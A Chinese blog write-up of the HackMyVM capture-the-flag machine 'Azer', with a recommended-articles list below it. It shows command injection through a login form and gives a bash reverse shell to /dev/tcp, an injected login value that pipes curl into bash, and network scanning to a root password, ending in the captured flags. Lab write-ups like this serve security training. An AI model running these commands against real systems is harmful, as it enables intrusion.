Azer - hackmyvm

最新推荐文章于 2024-07-19 16:20:10 发布
最新推荐文章于 2024-07-19 16:20:10 发布
阅读量469 收藏 11
点赞数 5
分类专栏: hackmyvm靶场合集 文章标签: 安全 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tanbinn/article/details/136605498
版权
本文讲述了在虚拟机环境中进行渗透测试的过程,包括使用Nmap扫描、发现命令注入漏洞、利用ncat建立连接、创建HTTP服务执行shell脚本、提权至root并利用fscan探测其他主机。作者详细描述了如何利用漏洞获取root权限和密码。
摘要由CSDN通过智能技术生成

简介

难度:简单

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Azer

本地环境

虚拟机:vitual box

靶场IP(Azer):192.168.56.102

渗透机IP(windows 10):192.168.56.1

扫描

小靶场,zanmap简单扫

nmap -p 1-65535 -T4 -A -v 192.168.56.102/32

image-20240310161213830

两个http端口80和3000

http

80

一个白血病儿童基金会的网页,全是土耳其文。看得有点眼花,先跳过

3000

登录界面

image-20240310162148115

随便输入个admin:123456,结果跳出报错:

Error executing bash script: Command failed: /home/azer/get.sh admin 1234565 fatal: not a git repository (or any of the parent directories): .git

感觉像是通过输入账密拉取git文件。虽然还不是很清楚,但可以看到后台应该是直接用shell执行该命令,这也就给我们命令注入的机会。

先起个nc

 ncat.exe -lvvp 50000

然后起个http服务到8001端口上,准备好shell.sh文件:

  1. python3 -m http.server 8001

  2. shell.sh:

bash -i >& /dev/tcp/192.168.56.1/50000 0>&1

最后在登录栏里面输入admin 123456;curl 192.168.56.1:8001/shell.sh | bash

image-20240310165217483

拿到USER

0d2856d69dc348b3af80a0eed67c7502

提权

先升级一下shell。

python3 -c 'import pty;pty.spawn("/bin/bash")'

检查了各个信息,发现系统启动了docker服务

image-20240310170958632

上传fscan,扫出10.10.10.10存活

./fscan -np -no -nopoc -h 10.10.10.1/24

azer@azer:~$ ./fscan -np -no -nopoc -h 10.10.10.1/24
./fscan -np -no -nopoc -h 10.10.10.1/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
10.10.10.10:80 open
10.10.10.1:80 open

这里说明一下为什么我参数里面加那么多no。因为最初我单用-h参数是啥也扫不出来的

image-20240310173136725

可以看到The current user permissions unable to send icmp packets,可能防火墙对icmp协议进行了过滤。所以只是以探活为目的的话,应尽量减少不必要的发包,一方面结果可能并不理想,另一方面就像这样被过滤掉,实际情况中这种流量八成是会被记录下来的。

(事后拿到root,查看iptables确实如此)

image-20240310173741692

curl一下该地址,得到root密码

image-20240310172303058

拿到root.txt

b5d96aec2d5f1541c5e7910ccab527d8

古明地核
关注
  • 5
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
阿里云oss访问图片出现跨域问题
weixin_30344995的博客
06-20 7596
// 获取图片地址并转码 var image = new Image(); image.crossOrigin = 'Anonymous'; image.src = ‘http://qqmmsh.oss-cn-hangzhou.aliyuncs.com/apply/6113528861282912.jpg’ image.onload = function()...
Azer-discord_bot
04-11
Azer-discord_bot】是一个基于Python编程语言创建的Discord聊天机器人项目。Discord是一个流行的即时通讯平台,尤其受到游戏玩家的欢迎,它允许用户创建服务器并进行语音、文字聊天。开发者可以利用Discord的API...
[HackmyVM]靶场 Azer
qq_34942239的博客
02-27 268
错误执行bash脚本,命令失败 admin admin,难道是把我输入的账号密码当成指令了吗。结果很简单,就是把输入的username和password拼接到$1和$2。curl一下10.10.10.0/24这个段,我一个一个试的...其他啥文件也没什么好用的,查看ip,发现有docker服务。发现10.10.10.10有东西,测试发现是root密码。提示不在仓库,意味着pwd可能执行了,但是没有回显。shell语法有问题,可能是某个分号多余了。一直在那转,看源码也没什么有用的东西。
前端路 - ES6
qq_37750365的博客
07-27 111
作用域 ES6 在全局作用域、局部作用域外,新增了一个块级作用域。在 { } 中使用 let / const 则会形成块级作用域,在 “块” 外层不能获取到 “块” 中的变量。在 for 循环中,for 的条件语句中声明的参数与其执行语句中声明的参数之间互相不影响,互相独立。可视为 for 循环中嵌套了两层作用域。 for (let i = 0; i < 3; i++) { let i = 'Azer'; console.log(i); } // Azer Azer Azer
探索高效编程的新境界:Azer的Emacs配置
gitblog_00053的博客
05-29 868
探索高效编程的新境界:Azer的Emacs配置 项目地址:https://gitcode.com/azer/emacs Azer's Emacs Setup 是一个专门为JavaScript和Go程序员量身定制的Emacs启动配置,它集成了诸多实用工具和技术,旨在提升开发效率,让代码编辑更加流畅。通过一键安装和更新,你将能够快速体验到这一强大编辑器的魅力。 项目简介 Azer的Emacs配置不仅包...
开源项目-azer-crud.zip
09-05
开源项目“azer-crud”是一个针对Go语言设计的轻量级关系数据库库,专注于CRUD(创建、读取、更新、删除)操作。这个库旨在提供一个简洁且高效的接口,帮助开发者快速处理数据库交互,同时保持代码的清晰性和可维护...
Economy-Highlow
05-16
我最秘密和最好的Highlow命令免责声明这些代码是我100%设计和创建的-Azer#8885。 因此,请确保您相信我。 否则,您将遇到版权问题。 该文件中没有病毒。 不要傻,复制和粘贴不会让您学习。 阅读代码。 我正在使用...
Go项目的示例Makefile-Golang开发
05-26
安装程序运行以下命令进行尝试:git clone https://github.com/azer/go-makefile-example.git cd go-makefile-example go get github.com/azer/yolo(需要文件监视)make install make start现在应该在:7777(在....
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 542
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 772
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
全文翻译 | OWASP《LLM安全与治理检查清单》
lurenjia404的博客
07-17 809
本文是OWASP(开放式网络应用安全项目)发布的《LLM AI安全与治理清单》(以下简称“清单”),旨在为使用大型语言模型(LLM)的组织提供安全与治理方面的指导。清单强调了负责任和可信的人工智能(AI)的重要性,并指出AI技术,尤其是LLM,在创新、效率和商业成功方面具有巨大潜力,同时也带来了明显的挑战。文中讨论了LLM面临的挑战,包括控制和数据平面的不可分割性、非确定性设计、语义搜索的使用等,并强调了LLM增加的攻击面和相关风险。
园区道路车辆智能管控视频解决方案,打造安全畅通的园区交通环境
TSINGSEE青犀视频官方技术博客
07-16 804
AI智能分析网关V4消防通道占用算法基于人工智能视觉分析技术,通过摄像头实时监测识别是否有机动车违规停放在消防车通道上,并及时提醒管理人员进行处理。
[Linux安全运维] OpenVPN部署
Da1NtY的博客
07-19 682
同样的,在创建服务端证书的时候也需要输入一个Common Name用户名,注意与根证书用户名不一样。下载网址: https://github.com/OpenVPN/easy-rsa。2.6.1 将服务端所需的必要文件放到/etc/openvpn/中。2.6.2 将客户端所需的必要文件放到/root/client/中。创建/etc/openvpn/目录,将easy-rsa放进去。签约证书需要输入根证书的密码,与签约服务端证书时的过程一样。在日志文件/var/log/中创建一个openvpn/
数据库安全审计系统:筑牢数据安全防线 提高数据资产安全
2401_82472120的博客
07-17 425
其可以监控和审计用户对数据库中的数据库表、视图、序列、包、存储过程、函数、库、索引、同义词、快照、触发器等的访问、创建、修改和删除等,分析的内容可以精确到SQL操作语句级别。另外,它还可以根据设置的规则,智能判断出违规操作数据库的行为,并对违规行为进行记录、报警。通过对用户访问数据库行为的记录、分析和汇报,来帮助用户事后生成合规报告、事故追根溯源,同时通过大数据搜索技术提供高效查询审计报告,定位事件原因,以便日后查询、分析、过滤,实现加强内外部数据库网络行为的监控与审计,提高数据资产安全
保障低压设备安全!中国星坤连接器精密工艺解析!
weixin_50506145的博客
07-16 522
随着技术的发展,对连接器的需求也在不断提升,特别是在低电压应用领域。中国星坤最新推出的低压连接器,以其精密性和安全性,为低电压设备提供了一个可靠的连接解决方案。中国星坤的低压连接器,以其卓越的性能和广泛的应用前景,为低电压设备的安全稳定运行提供了有力保障。随着技术的不断进步和市场需求的增长,低压连接器将在更多领域展现其独特的价值,成为连接现代电子世界的可靠伙伴。:在医疗领域,低压连接器用于连接各种便携式医疗监测设备,确保数据传输的准确性和设备的稳定性。:由于设计简洁,连接器的维护和更换变得简单快捷。
安全防御:防火墙基本模块
zhugedali_的博客
07-16 858
它会检查每个传入和传出的数据包的头部信息,包括源 IP 地址、目的 IP 地址、源端口、目的端口、协议类型(如 TCP、UDP、ICMP 等)以及数据包的标志位等。如果允许,防火墙会创建一个状态表项来记录该连接的状态,包括连接的方向、数据包的序列号等。- IDS/IPS 模块通常使用多种检测技术,包括基于特征的检测、基于异常的检测和基于协议分析的检测等,以提高检测的准确性和有效性。- 日志模块负责记录防火墙处理的所有活动和事件,包括数据包的过滤决策、连接的建立和终止、管理员的操作等详细信息。
Lianwei 安全周报|2024.07.15
联蔚盘云的博客
07-15 1261
新的一周又开始了,以下是本周「Lianwei周报」,我们总结推荐了本周的政策/标准/指南最新动态、热点资讯和安全事件,保证大家不错过本周的每一个重点!
游戏外挂的技术实现与五年脚本开发经验分享
最新发布
m0_62996549的博客
07-19 435
引言: 在数字娱乐的浪潮中,电子游戏成为许多人生活中不可或缺的一部分。然而,随着游戏的普及,一些玩家为了追求更高效的游戏体验或不正当竞争优势,开始使用游戏外挂程序。这些外挂往往通过修改游戏正常运行机制来提供非法优势给使用者。作为拥有五年脚本开发经验的技术人员,我深知探索这一领域需要严谨的态度和对技术的尊重。本文将探讨游戏外挂的技术实现方法,并分享我在脚本开发领域的经验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值